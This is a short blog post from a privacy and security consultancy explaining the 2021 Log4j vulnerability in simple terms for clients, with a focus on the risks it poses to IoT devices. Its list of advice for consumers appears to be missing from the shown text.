By Rebecca Herold
Last updated: December 28, 2021
Many of our Privacy and Security Brainiacs and Privacy Professor consultancy clients have asked for a simple description of the Log4j problems they’ve seen so much about in the news lately. Here are some key facts and advice we’ve provided to them.
Summarized with extreme simplicity, the Log4j security vulnerability is ultimately a result of insufficient secure coding and/or testing practices for software that is used in billions of devices worldwide, that is now being actively exploited, causing a wide variety of security incidents and privacy breaches.
Log4j is an open source software application program, written in Java computer code by volunteers who are considered to be programming experts. Log4j is used to create activity logs for devices running on Apple, Windows, and Linux systems. The logs provide activity details for the associated devices that can be used to troubleshoot problems, track data within the devices from which Log4j is used, or for other purposes. Log4j has been used as the de facto logging code within a huge number of software programs throughout the world because the logs are extremely useful for troubleshooting software problems. And possibly even more reason it is so widely used is that, since it is an open source program, Log4j code is free to use.
Let’s consider just a few facts, and then associated risks that exist to IoT products and their users as a result of the Log4j vulnerability. First a few facts:
IoT devices impact people’s lives worldwide. There are IoT devices that control, 1) temperatures in homes and other types of buildings; 2) personal assistants through voice-controls; 3) smart locks; 4) smoke and fire alarms; 5) smart electricity plugins; universal entertainment system remotes; 6) traffic lights; 7) Wi-Fi systems; 8) security systems; 9) garage door openers; 10) fitness trackers; 11) medical devices that are keeping people alive; 12) and an infinite list of other types of IoT devices.
Essentially, the Log4j vulnerability gives intruders a wide-open digital door, from wherever they are in the world, into your networks and devices. Once they are inside, they can wreak havoc by causing a wide range of harms: stealing, modifying, and deleting data; planting ransomware, malware, bots, spyware, and killware (which is a quickly growing concern); launching attacks on other networks from your devices, to cover their tracks and make it look like you were the attacker; bringing down networks and critical infrastructure to disrupt operations and disable systems that the public depends upon for safety and health.
Cybersecurity researchers are seeing cybercrooks actively targeting businesses to exploit the products that use Log4j to not only attack those businesses, but also use those business networks as gateways to the other businesses that are connected to the networks. They are also attacking the software itself to disrupt anyone who may be using the software. Given these facts, the potential harms from the risks are huge; from disruption of services, to the health and safety of people depending on them, to the data that is collected through them.
It is ultimately the responsibility of the manufacturers of the software containing the Log4j vulnerability to fix those software products as soon as possible, and for IoT product providers to ensure their products are updated as soon as possible. But how quickly will they fix the products? That will vary from manufacturer to manufacturer, and product to product.
We encourage IoT product consumers (organizations as well as individuals), and all other types of software and hardware, to be proactive. If you are such a consumer:
NOTE:
Images above may have been created by us, were purchased, and the others, such as the Log4j logo, were used under the U.S. Fair Use statute; Section 107 of the Copyright Act. Privacy and Security Brainiacs is not associated with or sponsored by the trademark owners of the images used under Fair Use.